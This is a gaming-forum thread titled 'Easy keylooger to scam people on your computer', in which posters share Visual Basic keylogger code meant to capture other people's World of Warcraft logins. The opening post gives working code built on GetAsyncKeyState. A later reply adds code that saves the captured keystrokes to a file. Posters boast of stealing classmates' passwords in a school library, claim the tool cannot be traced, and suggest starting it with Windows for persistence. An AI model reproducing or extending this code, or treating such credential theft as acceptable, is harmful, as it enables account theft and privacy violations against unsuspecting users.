Easy keylooger to scam people on your computer menu

Shout-Out

User Tag List

Results 1 to 14 of 14
  1. #1
    General Barcode's Avatar Contributor The Destroyer of Worlds

    CoreCoins Purchaser Authenticator enabled
    Reputation
    128
    Join Date
    Jul 2008
    Posts
    111
    Thanks G/R
    4/12
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Easy keylooger to scam people on your computer

    Hey this is for use in Visual basic, just keep the program minamized and when they log into wow there info will be put into the msg box in VB.

    Enter this code, if this doesn't work i can post a link in a later time im in a rush right now.
    make sure that you put a timer into the form and a textbox, like i said if you want i will add a link to the FRM later

    Dim result As Integer
    'Add a Timer & a Textbox to the form
    Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
    Private Sub Form_Load()
    Timer1.Interval = 1
    lbltime.Caption = "Scammed"
    frmTIMEMACHINE.Caption = "Log me"
    End Sub

    Private Sub Timer1_Timer()

    For i = 1 To 255
    result = 0
    result = GetAsyncKeyState(i)

    If result = -32767 Then
    Text1.Text = Text1.Text + Chr(i)
    End If
    Next i
    End Sub

    ok then when the program is running it logs everything typed on the keyboard, its really simple if you need any help let me know..good luck
    Last edited by General Barcode; 04-03-2009 at 01:47 PM.
    I am become death, The Destroyer of Worlds

    Easy keylooger to scam people on your computer
  2. #2
    Araredon's Avatar Contributor
    Reputation
    89
    Join Date
    Feb 2009
    Posts
    141
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Sounds good, too bad all my friends that play wow trust me enough and tell me their passwords. I know 3 of my friends passwords and I never even asked for them :P.
    Dont read this. It has nothing to do with you. Are you still reading? Why are you still reading? I told you not to read. It doesnt have anything to do with you. Are you happy now? You just wasted atleast 5 seconds of your life reading nothing.

  3. #3
    General Barcode's Avatar Contributor The Destroyer of Worlds

    CoreCoins Purchaser Authenticator enabled
    Reputation
    128
    Join Date
    Jul 2008
    Posts
    111
    Thanks G/R
    4/12
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    yeah lol, i use it a lot at my school in the library and there is like a group of kids that play wow there, so i scammed almost all of them so far its pretty hilarious, but it could be useful
    I am become death, The Destroyer of Worlds

  4. #4
    Vindicated's Avatar Contributor
    Reputation
    226
    Join Date
    Aug 2008
    Posts
    1,067
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Keylogging at school = not good. It's not that hard to trace it back to your computer :P


  5. #5
    General Barcode's Avatar Contributor The Destroyer of Worlds

    CoreCoins Purchaser Authenticator enabled
    Reputation
    128
    Join Date
    Jul 2008
    Posts
    111
    Thanks G/R
    4/12
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    its not really a keylogger, it just takes what ever is typed and puts it into the message box, its really only a good program to use when you start it up and then start up wow and have someone log into it, once you sign off your comp it doesnt continue running.

    you just need to plan your attack lol

    start program start wow have people log in...shows there log in on VB...

    cant really be traced since its a one time thing
    I am become death, The Destroyer of Worlds

  6. #6
    Jonthe838's Avatar Contributor
    Reputation
    83
    Join Date
    Aug 2008
    Posts
    373
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    if u does so this program starts up with windows will u will get alot of info ^^ and no1 will get away :P realy nice guide
    Lines of Coding: |||||||||| Goal 1000
    Current: 677 Achived Goals: 500 Lines


  7. #7
    General Barcode's Avatar Contributor The Destroyer of Worlds

    CoreCoins Purchaser Authenticator enabled
    Reputation
    128
    Join Date
    Jul 2008
    Posts
    111
    Thanks G/R
    4/12
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    yeah i have found it pretty usefull, since it logs everything even mouse clicks...but its annoying sometimes because you see the info like this

    llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllaccountl lllllllllllllllllllllllllllpassword

    but its still useful lol
    I am become death, The Destroyer of Worlds

  8. #8
    visitor's Avatar Contributor
    Reputation
    174
    Join Date
    Mar 2008
    Posts
    307
    Thanks G/R
    16/15
    Trade Feedback
    1 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    doesnt work on 64bit vista.. what should i do?
    Hey I just met you

  9. #9
    visitor's Avatar Contributor
    Reputation
    174
    Join Date
    Mar 2008
    Posts
    307
    Thanks G/R
    16/15
    Trade Feedback
    1 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    found a working trhat uses keyboardhook or whatnot.

    edit: hehe just made a keylogger that can be detected very hardly.
    Last edited by visitor; 04-13-2009 at 12:23 PM.
    Hey I just met you

  10. #10
    General Barcode's Avatar Contributor The Destroyer of Worlds

    CoreCoins Purchaser Authenticator enabled
    Reputation
    128
    Join Date
    Jul 2008
    Posts
    111
    Thanks G/R
    4/12
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    yeah its not that hard i made mine pretty quick, my friends have made ones that hide themselves...if you put the time into it, it isn't that hard
    I am become death, The Destroyer of Worlds

  11. #11
    Juggalo90's Avatar Member
    Reputation
    5
    Join Date
    Apr 2007
    Posts
    26
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    wow thanks, been lookin for this

  12. #12
    Ryoushi.'s Avatar Member
    Reputation
    54
    Join Date
    Nov 2008
    Posts
    126
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Could you add something to save to a .txt file automatically? D:

  13. #13
    mommymonkey's Avatar Active Member
    Reputation
    28
    Join Date
    Apr 2009
    Posts
    57
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    thanks for the keylogger

  14. #14
    visitor's Avatar Contributor
    Reputation
    174
    Join Date
    Mar 2008
    Posts
    307
    Thanks G/R
    16/15
    Trade Feedback
    1 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Ryoushi: you can easily do that with basic VB skills. but im not that mean:
    Code:
    Private Sub Timer1_Timer()
    dim whatnot as new system.io.streamwriter("c:\log.txt")
    For i = 1 To 255
    result = 0
    result = GetAsyncKeyState(i)
    
    If result = -32767 Then
    whatnot.write(Chr(i))
    End If
    Next i
    whatnot.dispose()
    whatnot.close()
    End Sub
    you write this instead of the original's timer
    Last edited by visitor; 05-01-2009 at 01:23 AM.
    Hey I just met you

Similar Threads

  1. Why is it so easy to scam people?
    By Heibi in forum World of Warcraft General
    Replies: 6
    Last Post: 10-03-2013, 04:55 AM
  2. [Emu] Easy mode Scamming people
    By Relentlesserv in forum WoW EMU Exploits & Bugs
    Replies: 1
    Last Post: 02-18-2008, 05:36 AM
  3. Your Computer Appears To Be Behind A Firewall
    By Forever in forum World of Warcraft Guides
    Replies: 7
    Last Post: 02-16-2007, 10:56 PM
  4. Sold my account and someone is scamming people with it
    By DJg in forum World of Warcraft General
    Replies: 3
    Last Post: 02-05-2007, 03:39 PM
All times are GMT -5. The time now is 09:19 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Google Authenticator verification provided by Two-Factor Authentication (Free) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search